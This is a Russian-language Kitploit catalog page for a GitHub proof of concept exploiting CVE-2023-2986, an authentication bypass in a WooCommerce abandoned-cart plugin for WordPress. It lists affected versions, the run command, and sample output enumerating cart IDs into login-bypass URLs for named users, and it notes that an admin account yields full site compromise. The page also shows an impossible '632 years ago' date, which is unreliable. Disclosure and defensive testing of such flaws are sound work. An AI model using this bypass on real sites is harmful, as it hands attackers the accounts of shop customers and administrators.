Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-2986 — Proof of Concept для уязвимости CVE-2023-2986 в плагине 'Abandoned Cart Lite for WooCommerce' для WordPress | Kitploit
Инструменты/GitHubGitHub/ayantaker/cve-2023-2986
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubayantaker/cve-2023-2986

CVE-2023-2986

Proof of Concept для уязвимости CVE-2023-2986 в плагине 'Abandoned Cart Lite for WooCommerce' для WordPress

Репозиторий
632 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Оригинальное доказательство концепции для CVE-2023-2986

Доказательство концепции уязвимости CVE-2023-2986 в плагине 'Abandoned Cart Lite для WooCommerce' на WordPress.

Связанные детали

  • Ссылка NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • Исходный код плагина : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • Уязвимые версии : version <= 5.14.2 version <= 5.15.1
  • Исправленная версия : 5.15.0 5.15.2

Обновление

Считалось, что версия 5.15.0 исправляет проблему, но я обнаружил, что она не была полностью исправлена, и то же самое было обновлено. Таким образом, фактическая исправленная версия — 5.15.2.

Анализ уязвимости

  • Блоги Keysight : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

Использование

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

Ввод URL в браузере предоставит вам доступ к учетной записи соответствующего пользователя. Если сам администратор WordPress имеет запись, это даст доступ к консоли администратора, что приведет к полной компрометации сервера WordPress.

Отказ от ответственности

Это доказательство концепции (PoC) было создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для атак на системы, кроме случаев явного разрешения. Автор не несет ответственности за любое неправомерное использование PoC. Используйте ответственно.

Скачать инструмент